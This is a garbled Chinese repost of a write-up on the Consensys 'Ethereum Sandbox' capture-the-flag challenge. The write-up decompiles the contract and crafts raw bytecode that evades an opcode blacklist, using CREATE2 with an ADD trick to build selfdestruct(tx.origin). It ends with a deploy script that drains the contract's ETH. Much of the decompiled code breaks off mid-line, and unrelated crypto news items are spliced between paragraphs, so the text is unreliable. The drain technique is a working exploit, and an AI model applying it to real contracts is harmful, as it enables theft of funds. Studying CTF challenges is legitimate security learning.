Consensys CTF - " 以太坊沙盒 "_INT:Quinta Eco

基于samczsun的解析文章学习

分析原文:

本文都是基于https://samczsun

elseif(0x2918435f==function_selector){0x2918435f();}elseif(0x4214352d==function_selector){0x4214352d();}elseif(0x74e3fb3e==function_selector){0x74e3fb3e();}

再看到其的全局变量,一共有两个,分别在slot0和slot1的位置处。可以看到这两个全局变量都是uint256数组。

uint256array_0;//STORAGEuint256_owners;//STORAGE

依次分析函数,找到我们感兴趣的部分,然后再深入调查该函数,看是否能够达到我们的目标——拿到该合约的所有ETH。

数据:Anchor每日净支出约490万美元,2.43亿美元储备预计还可覆盖50天需求:4月26日消息,Terra生态固定利率协议锚协议目前每日总支出约705万美元,总收入约215万美元,净支出约490万美元,同时锚资金储备还有2.43亿美元,预计还可覆盖50天的支出需求。[2022/4/26 5:12:22]

首先是函数1:0x4214352d

function0x4214352d(uint256varg0,uint256varg1)publicnonPayable{require(msg

//翻译一下functionset_array(uint256_value,uint256_key)public{require(msg

可以看到该函数主要是对array_0进行赋值,在赋值前检查了两项:

msg

=>functionget_array(uint256_key)publicviewreturns(uint256){require(msg

THORSwap将推出包含跨链收益聚合器的v2版本App:3月28日消息,基于 THORChain 的跨链 DEX 聚合器 THORSwap 将推出 v2 版本 App,新版本将利用 THORChain 协议和其他收益源组成跨链收益聚合器。新版本预计将在两周内推出。[2022/3/28 14:22:42]

与set_array函数类似

再看函数3:owners

functionowners(uint256varg0)publicnonPayable{require(msg

=>functionowners(uint256_key)publicviewreturns(address){require(msg

最后看函数4:0x2918435f

function0x2918435f(addressvarg0)publicpayable{require(msg

Anchorage宣布将支持Celo原生代币Celo Gold的储存和质押:Libra协会创始成员Anchorage宣布将支持“Libra竞争对手”Celo的原生代币Celo Gold的储存和质押。Anchorage联合创始人兼总裁Diogo Monica表示:“Anchorage正是为Celo这样的区块链而建的,这些区块链需要积极的链上治理。”(The Block)[2020/4/16]

v2=1;}require(v0);MEM=MEM(varg0

assert(v5<varg0

v7,v8=varg0

require(v7);}

可以看到函数40x2918435f比较复杂,简单分析函数4中有三层require:

要求调用该函数的msg

v2=1;}require(v0);=>翻译一下:boolpermit=false;uint256i=0;while(i<_owners

动态 | Device Authority宣布了保护企业区块链基础设施安全的新解决方案:据Businesswire消息,物联网身份和访问管理公司Device Authority今天宣布了其用于保护企业区块链基础设施安全的解决方案KeyScaler。Device Authority的KeyScaler平台可保护关键数据,私钥和资源免受未经授权的应用程序和实体的攻击。基于专利技术的灵活认证方法,可以轻松地为任何企业区块链实施此解决方案。[2018/9/25]

i=1;}require(permit);

3.要求作为传入参数的地址addr,逐字节检查该参数地址对应的代码,要求其中不含有0xf0,0xf1,0xf2,0xf4,0xfa,0xff等字节。在黄皮书中这几个字节对应的分别是:create,call,callcode,delegatecall,staticcall,selfdestruct.这部分对应的代码比较复杂,我们将对比opcode,逐字翻译```MEM=MEM(varg0

动态 | Beosin预警:cubecontract遭受攻击 攻击者已获利:Beosin(成都链安)预警,今天下午14:46-14:51之间,根据成都链安区块链安全态势感知系统Beosin-Eagle Eye检测发现,黑客justjiezhan1向EOS竞猜类游戏cubecontract发起攻击且已经获利。在此之前,黑客justjiezhan1已于12:00:41左右开始部署攻击合约,成都链安安全分析人员初步分析认为攻击者仍然与之前的攻击手法相同,为交易阻塞攻击。在此我们建议游戏合约开发者应该重视游戏逻辑严谨性及代码安全性,同时呼吁游戏项目方在项目上链前进行完善的代码安全审计,必要时可借助第三方专业审计团队的力量防患于未然。[2019/3/18]

assert(v5<varg0

}

问题分析-2

现在我们需要满足第三个条件,即构造一个合约,该合约对应的runtimecode中不含有0xf0,0xf1,0xf2,0xf4,0xfa,0xff等字节,因此需要我们手动来写合约,然后通过该sandbox的第四个函数来delegatecall该合约,从而清空sandbox中的ETH。

首先明确我们使用create2,其为0xf5,我们可以首先看下黄皮书中关于create2的定义

简单来说是先计算出要创建的合约的地址,然后执行要创建的合约的初始化代码,再将该初始化代码与要创建的合约地址进行关联。

故我们需要一个合约,他的runtimecode中执行一个create2函数,创建一个临时合约,并将上下文环境中的address(this)里的全部ETH都作为赠品赠与该临时合约,该临时合约的初始化代码中应该执行selfdestruct(tx.orgin)函数来将所有的ETH转移给合约部署人。

先用opcode来写runtimecode:

//tx.origin这里的ORIGIN是payload,不应该被执行,故需要改为push10x32//SELFDESTRUCT//构造payload,因为SELFDESTRUCT是0xff,不能被使用,故可以通过ADD来绕道实现push20x32fe//0x32fepush10x01//0x32fe0x01ADD//0x32ffpush10x40//0x32ff0x40mstore//构造payload0x40->0x32ff,push100//Us->salt盐push10x04//Us->length长度4push10x3e//us->offset偏移值->内存中0x400x20-0x2=0x3eADDRESSBALANCE//Us->ETH数量->应该是该address(this)的所有ETHcreate2=>6132fe60010160405260006004603e3031f5

在写该合约的初始化代码,可以用solidity写了,因为是我自己执行来部署该runtimecode

contractHackCTF{constructor()publicpayable{assembly{mstore(0x00,0x6132fe60010160405260006004603e3031f5)return(0x0e,0x12。}

然后部署HackCTF合约,在调用ctf中的第四个函数,将该合约的地址作为参数传进去即可

hacker=HackCTF.deploy({"from":alice})ctf.hack(hacker,{'from':alice})print(alice.balance())

免责声明:作为区块链信息平台,本站所发布文章仅代表作者个人观点,与链闻ChainNews立场无关。文章内的信息、意见等均仅供参考,并非作为或被视为实际投资建议。

本文来源于非小号媒体平台:

登链社区

现已在非小号资讯平台发布105篇作品,

非小号开放平台欢迎币圈作者入驻

入驻指南:

/apply_guide/

本文网址:

/news/10087897.html

免责声明:

1.资讯内容不构成投资建议,投资者应独立决策并自行承担风险

2.本文版权归属原作所有,仅代表作者本人观点,不代表非小号的观点或立场

上一篇:

SendingLabs完成1250万美元种子轮融资,以构建「Web3通信堆栈」

郑重声明: 本文版权归原作者所有, 转载文章仅为传播更多信息之目的, 如作者信息标记有误, 请第一时间联系我们修改或删除, 多谢。

金宝趣谈

[0:15ms0-4:578ms